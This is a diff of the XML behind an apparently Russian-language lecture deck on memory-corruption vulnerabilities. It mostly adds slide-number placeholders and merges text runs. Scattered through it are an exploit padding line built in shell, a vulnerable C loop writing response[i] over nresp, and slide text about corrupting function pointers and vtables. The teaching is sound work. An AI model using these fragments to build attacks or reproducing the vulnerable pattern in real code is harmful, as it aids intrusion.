-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>xff</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>"</a:t>
+              <a:t>  PAD="$PAD\\xff"</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -18800,6 +19928,35 @@
               </a:rPr>
               <a:t>shell</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD3B34BC-63C1-491E-AFFB-C88D8F8E5568}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>6</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -19099,6 +20256,35 @@
           </a:p>
           <a:p>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3709B5E7-8575-42F7-B79C-09B71D2ECECF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>60</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -19804,6 +20990,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="Slide Number Placeholder 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D408C19B-5574-4F99-90E9-4D37867E4354}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>61</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -20034,6 +21249,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A6C97D-05B3-4B1E-A057-AE52D63A6612}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>62</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -20288,6 +21532,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44EDC4A3-65C4-4E94-A281-A0BE05178B80}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>63</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -20372,6 +21645,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B137224-748D-4BDB-ABE8-90C98CA837A5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>64</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -20660,41 +21962,13 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>for (</a:t>
+              <a:t>for (i = 0; i &lt; </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> = 0; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> &lt; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
               <a:t>nresp</a:t>
             </a:r>
             <a:r>
@@ -20702,21 +21976,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>++)</a:t>
+              <a:t>; i++)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -20728,21 +21988,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>    response[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>] = </a:t>
+              <a:t>    response[i] = </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
@@ -20770,6 +22016,35 @@
               </a:rPr>
               <a:t>}</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A540DB8-9481-45E9-893B-0D224EDAB1B1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>65</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -20965,16 +22240,10 @@
               <a:t>место в рейтинге </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
+              <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>Mitre</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t> CWE Top 25 2024</a:t>
+              <a:t>Mitre CWE Top 25 2024</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -21113,6 +22382,35 @@
               <a:t>tate-of-the-art</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12A41556-480E-4729-ADF6-3923E269B73C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>66</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -21437,6 +22735,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33868409-33CB-4C67-8040-E83606EA0F55}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>67</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -21735,13 +23062,28 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверка не используется в </a:t>
+              <a:t>Защита не используется в </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>Ubuntu, Debian, Fedora</a:t>
             </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>, а также в браузерах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
@@ -21773,6 +23115,35 @@
               <a:t>Android Developers Blog: Compiler-based security mitigations in Android P</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5801BD-7B4E-4514-8AA3-A09D92C0889F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>68</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -21860,6 +23231,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{934B8C4B-48BF-4058-802E-0D20054B7F7F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>69</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -21993,7 +23393,7 @@
               <a:t>Испортить данные в несвязанном буфере (например указатели на функции или </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>vtables</a:t>
             </a:r>
             <a:r>
@@ -22131,6 +23531,35 @@
               <a:t>https://kingsvilletimes.ca/2022/10/common-sense-health-rake-up-the-leaves-this-fall/</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6E0C0D9-F842-434D-BAB4-71739952D6BC}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>7</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -22480,6 +23909,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F25766B-7B2B-4C12-94AA-54E992E6FEE6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>70</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -22688,6 +24146,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D988944B-F83A-482A-9953-617605B07433}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>71</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -22808,6 +24295,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B261491-65C9-4470-A89B-6DE839DB55A1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>72</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -23168,6 +24684,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D405C3-F9FF-4287-9BE6-E2E206509246}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>73</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -23247,6 +24792,35 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C904DFF2-B815-4E5A-8373-7AEA38108AD2}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>74</a:t>
+            </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
@@ -24006,6 +25580,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Slide Number Placeholder 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA5402B7-62FC-4BC0-B6CF-A5FCEC3339B7}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>75</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -24299,6 +25902,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5F4C849-EE98-4101-B294-7B8C5847EA47}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>76</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -24455,6 +26087,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
